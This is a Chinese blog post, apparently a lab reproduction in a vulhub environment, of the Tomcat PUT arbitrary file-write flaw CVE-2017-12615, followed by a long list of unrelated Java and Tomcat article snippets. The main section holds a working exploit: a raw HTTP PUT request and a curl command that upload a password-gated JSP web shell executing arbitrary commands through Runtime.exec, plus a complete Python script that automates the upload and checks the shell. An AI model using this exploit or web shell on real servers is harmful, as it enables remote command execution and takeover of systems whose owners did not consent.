努力的学渣'#
努力的学渣'#

Tomcat PUT方法任意写文件漏洞(CVE-2017-12615)

当 Tomcat启用了HTTP PUT请求方法并且将 readonly 初始化参数由默认值设置为 false,就能执行任意文件写入漏洞

Tomcat 版本内web.xml配置文件内默认配置无readonly参数,需要手工添加,所以默认配置条件下不受此漏洞影响。
配置文件为 \conf\web.xml
Tomcat PUT方法任意写文件漏洞(CVE-2017-12615)_第1张图片

利用vulhub搭建漏洞环境 目录为tomcat/CVE-2017-12615 环境启动成功
Tomcat PUT方法任意写文件漏洞(CVE-2017-12615)_第2张图片

  • 直接构造如下exp
PUT /shell1.jsp/ HTTP/1.1
Host:目标ip
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 417

<%
    if("123".equals(request.getParameter("pwd"))){
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
        int a = -1;          
        byte[] b = new byte[1024];          
        out.print("
");          
        while((a=in.read(b))!=-1){
            out.println(new String(b));          
        }
        out.print("
");
    } 
%>

Tomcat PUT方法任意写文件漏洞(CVE-2017-12615)_第3张图片

也可以用linux的curl进行put写入木马

curl -XPUT 目标ip/aufeng.jsp/ --data "aufeng"

Tomcat PUT方法任意写文件漏洞(CVE-2017-12615)_第4张图片

直接打脚本,原理就是构造一个请求包。
Tomcat PUT方法任意写文件漏洞(CVE-2017-12615)_第5张图片

脚本如下:

import requests
import sys
import time

'''
Usage:
	python CVE-2017-12615.py http://127.0.0.1

	shell: http://127.0.0.1/shell.jsp?pwd=AF&cmd=whoami


'''

def attack(url):
	user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
	headers={"User-Agent":user_agent}
	data="""<%
    if("AF".equals(request.getParameter("pwd"))){
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
        int a = -1;
        byte[] b = new byte[2048];
        out.print("
");
        while((a=in.read(b))!=-1){
            out.println(new String(b));
        }
        out.print("
");
    }
%>"""
	try:
		requests.put(url, headers=headers, data=data)

		time.sleep(2)

		verify_response = requests.get(url[:-1], headers=headers)

		if verify_response.status_code == 200:
			print 'success!'
		else :
			print verify_response.status_code

	except :
		"error"

if __name__ == '__main__':
	target_url = sys.argv[1] + '/shell.jsp/'

	attack(target_url)
	print 'shell: ' + target_url[:-1]

你可能感兴趣的:(复现漏洞,tomcat,CVE-2017-12615)

  • Spring Boot中的响应与分层解耦架构 小村学长毕业设计 springboot架构后端
    SpringBoot中的响应与分层解耦架构在SpringBoot框架中,响应与分层解耦架构是两个核心概念,它们共同促进了应用程序的高效性、可维护性和可扩展性。下面将详细探讨这两个方面,包括SpringBoot的响应机制、分层解耦的三层架构以及它们在实际开发中的应用。一、SpringBoot的响应机制SpringBoot的响应机制主要依赖于其内置的Servlet容器(如Tomcat)和SpringM
  • 【SpringBoot4】如何理解SpringBoot的约定大于配置 纵横千里,捭阖四方 spring家族一个项目征服Javaspringjava后端
    今天我们来谈谈SpringBoot到底给我们带来了什么以及如何做的。目录1.指导思想:约定大于配置2.SpringBoot的依赖管理3.小结1.指导思想:约定大于配置Spring的优势是帮助我们管理Bean类,并且集成大量的组件,例如连接数据库、网络通信、甚至Tomcat都可以,但是我们在使用Spring的时候还需要写大量的配置文件,例如定义谁依赖谁等等。当我们的业务代码比较多的时候,这个配置简直
  • springboot项目如何部署到tomcat中 红豆和绿豆 javaspringboottomcat服务器
    1、使用springboot内部嵌入的tomcat可以改一些tomcat的参数2、可以把springboot项目打包为war包,然后部署到tomcat中去SpringBoot默认使用嵌入式Tomcat作为其Web容器,这使得SpringBoot应用可以作为一个独立的JAR文件运行。这种嵌入式服务器的方式简化了部署过程,只需要Java环境即可运行。嵌入式Tomcat的特点简化部署:SpringBoo
  • Windows操作系统部署Tomcat详细讲解 web15117360223 面试学习路线阿里巴巴windowstomcatjava
    Tomcat是一个开源的JavaServlet容器,用于处理JavaWeb应用程序的请求和响应。以下是关于Tomcat的用法大全:一、安装Tomcat下载访问ApacheTomcat官方网站(https://tomcat.apache.org/),根据你的操作系统(如Windows、Linux、macOS)和需求选择合适的版本进行下载。例如,对于开发环境,通常选择较新的稳定版本。安装(以Windo
  • springboot项目配置https 愿企鹅飞(。ò ∀ ó。) Javajavatomcatjarspringeclipse
    1,必须去服务商购买一个ssl证书。2,以我想的是这个域名的8080端口当前端,8070当后端,3,前端配置简单直接去下载nginx证书把里面的key和证书粘到对应位置即可(用宝塔简单)4.springboot后端服务(下载Tomcat证书)按照这个方法https://blog.csdn.net/baidu_37302589/article/details/100692957配置端口配置成我需要的
  • springboot之https服务器(生成keystore证书库及转cer证书) Biu→Biu丶 springboothttpsjavahttps
    一.生成自签名证书打开cmd输入命令生成证书:keytool-genkeypair-aliastomcat_https-keypass123456-keyalgRSA-keysize1024-validity365-keystore./https-java.keystore-storepass123456属性说明:-alias别名-keypass指定生成密钥的密码-keyalg指定密钥使用的加密算
  • Linux部署Tomcat无法访问 zb_3Dmax javatomcatlinux服务器开发语言servlet
    前言环境:RedHat7.0,Tomcat7,JDK7安装配置成功之后,启动tomcat服务,然后使用本地浏览器访问http://xx:xx:xx:xx:8080,无法访问。解决过程首先怀疑是配置问题,终端输出:echo$JAVA_HOMEecho$TOMCAT_HOME一切正常,排除然后怀疑是防火墙问题:RHEL7中使用了firewalld代替了原来的iptables,操作设置和原来有点不同:查
  • nginx反向代理tomcat yandong634 nginxtomcat运维
    背景因客户需要对某个应用对外开放访问,需要有ssl安全协议,又考虑到后面可能还会有多个应用对外开放访问,因此决定用nginx来配置ssl证书,通过nginx来转发到后台应用。环境后台应用服务:tomcat7负载均衡服务:nginx1.26.3配置nginx.conf#HTTPSserverserver{#listen443ssl;listen8088ssl;http2on;#server_name
  • 关于tomcat升级9.0后URL访问报404的解决办法 不甘于平凡的溃败 tomcat
    目录1前言32出现问题33解决办法及思路44总结5前言在现场环境使用tomat7.0,用户反馈版本较低,存在一定的安全隐患,故升级到tomcat9.0。2出现问题
  • tomcat升级报错 格格巫 MMQ!! liunx软件tomcatjavaservlet
    Attributevaluerequest.getContextPath()+“/formula/taskRepetition.do”isquotedwith"whichmustbeescapedwhenusedwithinthevalue1.访问JSP时,报错:Attributevalueisquotedwith"whichmustbeescapedwhenusedwithinthevalue。
  • Tomcat 8.5 优化指南 最爱で毛毛熊 tomcat
    Tomcat8.5优化指南Tomcat8.5是一个广泛使用的JavaWeb应用服务器,但在高并发或资源受限的环境中,默认配置可能无法满足性能需求。以下是一些常见的优化措施,帮助你提升Tomcat8.5的性能和稳定性。1.JVM优化Tomcat运行在JVM上,优化JVM参数可以显著提升性能。1.1内存设置调整JVM的堆内存大小,避免内存不足或频繁的垃圾回收。在catalina.sh(Linux)或c
  • Tomcat配置域名/IP访问及其中遇到的问题注意事项 智能玩家 Tomcat
    最近项目需要配置IP访问,最后总结了一下:1.先在tomcat下的conf下找到server.xml文件,用记事本打开后,首先对端口号进行修改,以前一直以为8080是默认的端口号,其实默认的端口号是80改为<Connectorport="80"maxHttpHeaderSize="8192"maxThreads="150"minSpareThreads="25"maxSpareThreads=
  • Tomcat安装与配置详解:从入门到精通 一休哥助手 javatomcatjava
    一、Tomcat简介1.1什么是Tomcat?Tomcat是由Apache软件基金会开发和维护的一款轻量级Java应用服务器,能够运行JavaServlet和JSP应用程序。Tomcat作为JavaWeb服务器与传统的Web服务器(如ApacheHTTPServer)配合使用,以便提供动态的Web服务。1.2Tomcat的主要特性轻量级:Tomcat的体积较小,启动速度快,资源消耗低,非常适合开发
  • 溯源-如何还原攻击路径 C Aires 网络安全之溯源一网络安全网络网络协议
    溯源-如何还原攻击路径1.web入侵流程2.windows-还原攻击路径3.linux-还原攻击路径1.web入侵流程信息收集->漏洞扫描->渗透攻击->提权->后渗透->持续控制2.windows-还原攻击路径日志分析web日志存在位置:1.默认安装位置的logs文件夹下/2.tomcat日志catalina.out(引擎的日志文件)、localhost(内部代码丢出的日志)、manager(应
  • Java面试经验个人总结(十五)——Tomcat 爱喝牛奶的小喵 Java面试经验Tomcat
    Tomcat一、使用tomcat的原因1.用来管理servlet的生命周期;2.处理客户端请求的网络连接,并发负载分派到不同的服务器这些网络服务器的基本功能也是这些像Tomcat一样的服务器需要处理的。二、Tomcat的请求流程(客户的请求为:http://localhost:8080/test/index.jsp)1.请求被发送到本机端口8080,被在那里侦听的CoyoteHTTP/1.1Con
  • Tomcat服务器:Java Web应用的强大后盾 互联网动态分析 tomcat
    在当今的Web开发领域,ApacheTomcat作为开源的Servlet容器和JavaServerPages(JSP)引擎,扮演着举足轻重的角色。它不仅为JavaWeb应用提供了一个稳定、高效的运行环境,还以其灵活的配置和丰富的功能赢得了广大开发者的青睐。本文将深入探讨Tomcat的基本概念、架构特点、配置与优化,以及在实际应用中的常见问题与解决方案。一、Tomcat概述Tomcat是由Apach
  • Tomcat性能优化与负载均衡实现 互联网动态分析 tomcat
    在现代互联网应用中,ApacheTomcat作为一个广泛使用的JavaWeb应用服务器,扮演着至关重要的角色。随着用户数量的不断增加和业务的不断扩展,如何提升Tomcat的性能和实现高可用性成为了开发者们关注的焦点。本文将介绍Tomcat的性能优化技巧以及如何通过负载均衡技术来提升系统的整体性能和可用性。一、Tomcat性能优化Tomcat自身配置管理页面配置:通过配置tomcat-users.x
  • vs构建网络安全系统 网络安全和网络搭建 网络安全Jack web安全网络安全
    网站的组成和搭建网站由服务器,容器,脚本,数据库组成。服务器和家庭电脑一样。容器又为环境或服务:apache,lls,tomcat,nginx等脚本:php,aspx,asp,jsp等数据库:mssql,access,oracle等环境的搭配关系:1.apache+mysql+php2.nginx+mysql+php3.iis+access+asp4.iis+mssql+aspx5.iis+mss
  • day---04 健子bui CSDN使用java
    1.SpringMVC调用流程1.1组件说明1.1.0Servlet作用在这里插入图片描述1.1.1前端控制器(Servlet机制)作用:SpringMVC中控制用户的请求的转发…/响应的规则1.1.2处理器映射器铺垫:404什么错误请求资源没有找到.作用:标识用户的请求路径/后端执行的方法的映射关系.数据结构:Map工作过程:当tomcat服务器启动时,带动SpringMVC的组件运行.将所有的
  • IDEA配置JSTL 阿俊仔(摸鱼版) intellij-ideajavatomcat
    IDEA配置JSTL下载JSTL官网下载地址:https://tomcat.apache.org翻到下面找到:点击,download下载下面内容:(就Impl和Spec)配置JSTL将两个下好的jar包放在lib文件夹下ctrl+shift+alt+s打开ProjectStructure左侧找到Modules->右侧选择Dependences->点击➕号Library->点击java->选中WEB
  • Tomcat Request Cookie 丢失问题 m0_74825447 面试学习路线阿里巴巴tomcatfirefoxjava
    优质博文:IT-BLOG-CN一、问题描述生产环境偶尔(涉及到多线程处理)出现"前端传递`Cookie为空"的告警,导致前端请求丢失,出现请求失败问题。告警内容如下前端传递Cookie为空告警内容:服务端获取requestCookie为空,请尽快处理!!!AppId:xxxxxxip:xx.xx.xxx.xx告警事件:2024-03-15背景:为什么要加Cookie告警:项目出海,需要保证多语言,
  • HttpServletRequest 作用 冰糖心158 2025Java面试系列Java开发java
    HttpServletRequest接口在JavaServletAPI中扮演着至关重要的角色,它是Servlet处理客户端HTTP请求的核心对象。每次客户端(例如浏览器)向服务器发送一个HTTP请求时,Servlet容器(例如Tomcat)都会创建一个HttpServletRequest对象,并将客户端的请求数据封装在这个对象中,然后将这个对象传递给Servlet的service()方法(或者do
  • 浅谈Java Spring Boot 框架分析和理解 微笑的曙光(StevenLi) JAVAjavaspringboot开发语言
    SpringBoot是一个简化Spring开发的框架,它遵循“约定优于配置”的原则,通过内嵌的Tomcat、Jetty或Undertow等容器,使得开发者能够快速构建独立运行的、生产级别的基于Spring框架的应用程序。SpringBoot包含了大量的自动配置功能,可智能识别已存在的库并配置相应组件,从而减少手动配置的工作量。JavaSpringBoot是一个基于Spring框架的开源Java框架
  • 深入拆解Tomcat&Jetty(七) r09er_0407
    回顾一下Tomcat的启动步骤1.安装JDK,配置环境变量2.下载Tomcat并解压3.执行tomcat/bin目录下的start.sh执行脚本后的流程image1.Tomcat本质上还是一个Java程序,因此startup.sh脚本会启动一个JVM来运行Tomcat的启动类BootStrap其实Tomcat和我们自己平时写的代码并没有本质上的区别,只是Tomcat的启动时通过脚本.我们常用的Sp
  • SpringBoot的application.properties 配置时,在高并发、高数据量上有哪些注意事项 陈老师还在写代码 SpringBoot100问springboot后端java
    在高并发、高数据量的场景下,SpringBoot的application.properties配置需要特别注意以下几个方面:1.数据库连接池配置连接池大小:根据并发量和数据库性能调整连接池大小。常用的连接池如HikariCP、TomcatJDBC等。spring.datasource.hikari.maximum-pool-size=20spring.datasource.hikari.minim
  • 基于SSM+Vue的手机商城销售系统项目 酷爱码 vuessm毕业设计javamysql
    基于SSM+Vue的手机商城销售系统项目,该系统进行前后端分离开发,最后打包整合开发环境:jdk1.8,tomcat1.8,node.js,Mysql8.0开发工具:idea2019开发技术:SSM,Vue,ElementUI,VueX,Ajax打包版免费下载:基于VUE+SSM手机商城销售系统(打包版).zip-蓝奏云开发版下载地址:基于VUE+SSM手机商城销售系统.zip_vuessm项目视
  • java ssm mysql 开源_SSM(Spring+Spring MVC+Mybatis)开发简约漂亮的java开源博客管理系统,其中前台后台功能完整。... weixin_39750598 javassmmysql开源
    项目描述本项目通过SSM(SpringMVC+Mybatis+Spring)框架编写的一个人博客管理系统,使用hexo主题,以及MAVEN进行对项目管理,并且前端具有粒子和点击爱心效果.后端的页面框架为bootstrap.数据库为mysql.运行环境jdk8+tomcat8+mysql+eclipse+maven(idea)项目技术(必填)spring+springmvc+mybatis+boot
  • 关于配置pom.xml中的servlet-api依赖时产生Could not start Tomcat、ExecutionException、Failed to start component异常分析 yspm700 tomcatmavenjavaservlet开发语言
    原因:tomcat8已内置servlet,再使用tomcat7插件(tomcat7-maven-plugin)配置的时候,如果不指定servlet的scope(作用域、生效范围),则会产生多个servlet的冲突问题。解决办法::限制作用域为provided,代码如下所示://添加providedjavax.servletservlet-api2.5provided作用域(scope)的对比介绍如
  • 前端连接websocket失败_Websocket出现的错误 weixin_39847034 前端连接websocket失败
    前端使用sockjs,后台使用spring的websocket框架结果在一个网络较慢的地方,发现tomcat报错信息:Oct28,201510:10:43AMorg.apache.catalina.core.StandardWrapperValveinvokeSEVERE:Servlet.service()forservlet[mvc-dispatcher]incontextwithpath[/r
  • 史上最厉害的Java进阶之路 m0_51274464 面试学习路线阿里巴巴java开发语言
    你想了解Java吗?你知道大神的运算符怎么玩吗?这是Java的流程控制,操控“一切”那些年,那些大神玩的数组来场刺激的数组训练吧!面向对象(封装、继承,多态,抽象)面向对象基础综合练习集合泛型异常多线程实用类I/O流反射XML解析网络编程TomcatServlet手写web应用服务JavaWeb史上最详细的框架集合
  • 多线程编程之卫生间 周凡杨 java并发卫生间线程厕所
    如大家所知,火车上车厢的卫生间很小,每次只能容纳一个人,一个车厢只有一个卫生间,这个卫生间会被多个人同时使用,在实际使用时,当一个人进入卫生间时则会把卫生间锁上,等出来时打开门,下一个人进去把门锁上,如果有一个人在卫生间内部则别人的人发现门是锁的则只能在外面等待。问题分析:首先问题中有两个实体,一个是人,一个是厕所,所以设计程序时就可以设计两个类。人是多数的,厕所只有一个(暂且模拟的是一个车厢)。
  • How to Install GUI to Centos Minimal sunjing linuxInstallDesktopGUI
    http://www.namhuy.net/475/how-to-install-gui-to-centos-minimal.html   I have centos 6.3 minimal running as web server. I’m looking to install gui to my server to vnc to my server. You can insta
  • Shell 函数 daizj shell函数
    Shell 函数 linux shell 可以用户定义函数,然后在shell脚本中可以随便调用。 shell中函数的定义格式如下: [function] funname [()]{ action; [return int;] } 说明: 1、可以带function fun() 定义,也可以直接fun() 定义,不带任何参数。 2、参数返回
  • Linux服务器新手操作之一 周凡杨 Linux 简单 操作
    1.whoami      当一个用户登录Linux系统之后,也许他想知道自己是发哪个用户登录的。      此时可以使用whoami命令。      [ecuser@HA5-DZ05 ~]$ whoami       e
  • 浅谈Socket通信(一) 朱辉辉33 socket
    在java中ServerSocket用于服务器端,用来监听端口。通过服务器监听,客户端发送请求,双方建立链接后才能通信。当服务器和客户端建立链接后,两边都会产生一个Socket实例,我们可以通过操作Socket来建立通信。    首先我建立一个ServerSocket对象。当然要导入java.net.ServerSocket包    ServerSock
  • 关于框架的简单认识 西蜀石兰 框架
    入职两个月多,依然是一个不会写代码的小白,每天的工作就是看代码,写wiki。 前端接触CSS、HTML、JS等语言,一直在用的CS模型,自然免不了数据库的链接及使用,真心涉及框架,项目中用到的BootStrap算一个吧,哦,JQuery只能算半个框架吧,我更觉得它是另外一种语言。 后台一直是纯Java代码,涉及的框架是Quzrtz和log4j。 都说学前端的要知道三大框架,目前node.
  • You have an error in your SQL syntax; check the manual that corresponds to your 林鹤霄
    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'option,changed_ids  ) values('0ac91f167f754c8cbac00e9e3dc372
  • MySQL5.6的my.ini配置 aigo mysql
    注意:以下配置的服务器硬件是:8核16G内存    [client]   port=3306   [mysql]   default-character-set=utf8     [mysqld]   port=3306   basedir=D:/mysql-5.6.21-win
  • mysql 全文模糊查找 便捷解决方案 alxw4616 mysql
    mysql 全文模糊查找 便捷解决方案 2013/6/14 by 半仙 [email protected] 目的: 项目需求实现模糊查找. 原则: 查询不能超过 1秒. 问题: 目标表中有超过1千万条记录. 使用like '%str%' 进行模糊查询无法达到性能需求. 解决方案: 使用mysql全文索引. 1.全文索引 : MySQL支持全文索引和搜索功能。MySQL中的全文索
  • 自定义数据结构 链表(单项 ,双向,环形) 百合不是茶 单项链表双向链表
         链表与动态数组的实现方式差不多,    数组适合快速删除某个元素    链表则可以快速的保存数组并且可以是不连续的       单项链表;数据从第一个指向最后一个   实现代码:        //定义动态链表 clas
  • threadLocal实例 bijian1013 javathreadjava多线程threadLocal
    实例1: package com.bijian.thread; public class MyThread extends Thread { private static ThreadLocal tl = new ThreadLocal() { protected synchronized Object initialValue() { return new Inte
  • activemq安全设置—设置admin的用户名和密码 bijian1013 javaactivemq
            ActiveMQ使用的是jetty服务器, 打开conf/jetty.xml文件,找到 <bean id="adminSecurityConstraint" class="org.eclipse.jetty.util.security.Constraint"> <p
  • 【Java范型一】Java范型详解之范型集合和自定义范型类 bit1129 java
    本文详细介绍Java的范型,写一篇关于范型的博客原因有两个,前几天要写个范型方法(返回值根据传入的类型而定),竟然想了半天,最后还是从网上找了个范型方法的写法;再者,前一段时间在看Gson, Gson这个JSON包的精华就在于对范型的优雅简单的处理,看它的源代码就比较迷糊,只其然不知其所以然。所以,还是花点时间系统的整理总结下范型吧。   范型内容 范型集合类 范型类
  • 【HBase十二】HFile存储的是一个列族的数据 bit1129 hbase
    在HBase中,每个HFile存储的是一个表中一个列族的数据,也就是说,当一个表中有多个列簇时,针对每个列簇插入数据,最后产生的数据是多个HFile,每个对应一个列族,通过如下操作验证   1. 建立一个有两个列族的表   create 'members','colfam1','colfam2'   2. 在members表中的colfam1中插入50*5
  • Nginx 官方一个配置实例 ronin47 nginx 配置实例
    user www www; worker_processes 5; error_log logs/error.log; pid logs/nginx.pid; worker_rlimit_nofile 8192; events { worker_connections 4096;} http { include conf/mim
  • java-15.输入一颗二元查找树,将该树转换为它的镜像, 即在转换后的二元查找树中,左子树的结点都大于右子树的结点。 用递归和循环 bylijinnan java
    //use recursion public static void mirrorHelp1(Node node){ if(node==null)return; swapChild(node); mirrorHelp1(node.getLeft()); mirrorHelp1(node.getRight()); } //use no recursion bu
  • 返回null还是empty bylijinnan javaapachespring编程
    第一个问题,函数是应当返回null还是长度为0的数组(或集合)? 第二个问题,函数输入参数不当时,是异常还是返回null? 先看第一个问题 有两个约定我觉得应当遵守: 1.返回零长度的数组或集合而不是null(详见《Effective Java》) 理由就是,如果返回empty,就可以少了很多not-null判断: List<Person> list
  • [科技与项目]工作流厂商的战略机遇期 comsci 工作流
          在新的战略平衡形成之前,这里有一个短暂的战略机遇期,只有大概最短6年,最长14年的时间,这段时间就好像我们森林里面的小动物,在秋天中,必须抓紧一切时间存储坚果一样,否则无法熬过漫长的冬季。。。。         在微软,甲骨文,谷歌,IBM,SONY
  • 过度设计-举例 cuityang 过度设计
    过度设计,需要更多设计时间和测试成本,如无必要,还是尽量简洁一些好。 未来的事情,比如 访问量,比如数据库的容量,比如是否需要改成分布式  都是无法预料的 再举一个例子,对闰年的判断逻辑:   1、 if($Year%4==0) return True; else return Fasle;   2、if (   ($Year%4==0  &am
  • java进阶,《Java性能优化权威指南》试读 darkblue086 java性能优化
    记得当年随意读了微软出版社的.NET 2.0应用程序调试,才发现调试器如此强大,应用程序开发调试其实真的简单了很多,不仅仅是因为里面介绍了很多调试器工具的使用,更是因为里面寻找问题并重现问题的思想让我震撼,时隔多年,Java已经如日中天,成为许多大型企业应用的首选,而今天,这本《Java性能优化权威指南》让我再次找到了这种感觉,从不经意的开发过程让我刮目相看,原来性能调优不是简单地看看热点在哪里,
  • 网络学习笔记初识OSI七层模型与TCP协议 dcj3sjt126com 学习笔记
      协议:在计算机网络中通信各方面所达成的、共同遵守和执行的一系列约定   计算机网络的体系结构:计算机网络的层次结构和各层协议的集合。   两类服务:   面向连接的服务通信双方在通信之前先建立某种状态,并在通信过程中维持这种状态的变化,同时为服务对象预先分配一定的资源。这种服务叫做面向连接的服务。   面向无连接的服务通信双方在通信前后不建立和维持状态,不为服务对象
  • mac中用命令行运行mysql dcj3sjt126com mysqllinuxmac
    参考这篇博客:http://www.cnblogs.com/macro-cheng/archive/2011/10/25/mysql-001.html  感觉workbench不好用(有点先入为主了)。 1,安装mysql 在mysql的官方网站下载 mysql 5.5.23 http://www.mysql.com/downloads/mysql/,根据我的机器的配置情况选择了64
  • MongDB查询(1)——基本查询[五] eksliang mongodbmongodb 查询mongodb find
    MongDB查询 转载请出自出处:http://eksliang.iteye.com/blog/2174452 一、find简介 MongoDB中使用find来进行查询。 API:如下 function ( query , fields , limit , skip, batchSize, options ){.....}  参数含义: query:查询参数 fie
  • base64,加密解密 经融加密,对接 y806839048 经融加密对接
    String data0 = new String(Base64.encode(bo.getPaymentResult().getBytes(("GBK")))); String data1 = new String(Base64.decode(data0.toCharArray()),"GBK"); // 注意编码格式,注意用于加密,解密的要是同
  • JavaWeb之JSP概述 ihuning javaweb
      什么是JSP?为什么使用JSP? JSP表示Java Server Page,即嵌有Java代码的HTML页面。使用JSP是因为在HTML中嵌入Java代码比在Java代码中拼接字符串更容易、更方便和更高效。   JSP起源    在很多动态网页中,绝大部分内容都是固定不变的,只有局部内容需要动态产生和改变。  如果使用Servl
  • apple watch 指南 啸笑天 apple
    1. 文档 WatchKit Programming Guide(中译在线版 By @CocoaChina) 译文 译者 原文 概览 - 开始为 Apple Watch 进行开发 @星夜暮晨 Overview - Developing for Apple Watch 概览 - 配置 Xcode 项目 - Overview - Configuring Yo
  • java经典的基础题目 macroli java编程
    1.列举出 10个JAVA语言的优势 a:免费,开源,跨平台(平台独立性),简单易用,功能完善,面向对象,健壮性,多线程,结构中立,企业应用的成熟平台, 无线应用 2.列举出JAVA中10个面向对象编程的术语 a:包,类,接口,对象,属性,方法,构造器,继承,封装,多态,抽象,范型 3.列举出JAVA中6个比较常用的包 Java.lang;java.util;java.io;java.sql;ja
  • 你所不知道神奇的js replace正则表达式 qiaolevip 每天进步一点点学习永无止境纵观千象regex
    var v = 'C9CFBAA3CAD0'; console.log(v); var arr = v.split(''); for (var i = 0; i < arr.length; i ++) { if (i % 2 == 0) arr[i] = '%' + arr[i]; } console.log(arr.join('')); console.log(v.r
  • [一起学Hive]之十五-分析Hive表和分区的统计信息(Statistics) superlxw1234 hivehive分析表hive统计信息hive Statistics
    关键字:Hive统计信息、分析Hive表、Hive Statistics   类似于Oracle的分析表,Hive中也提供了分析表和分区的功能,通过自动和手动分析Hive表,将Hive表的一些统计信息存储到元数据中。   表和分区的统计信息主要包括:行数、文件数、原始数据大小、所占存储大小、最后一次操作时间等;   14.1 新表的统计信息 对于一个新创建
  • Spring Boot 1.2.5 发布 wiselyman spring boot
        Spring Boot 1.2.5已在7月2日发布,现在可以从spring的maven库和maven中心库下载。   这个版本是一个维护的发布版,主要是一些修复以及将Spring的依赖提升至4.1.7(包含重要的安全修复)。   官方建议所有的Spring Boot用户升级这个版本。   项目首页 | 源
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他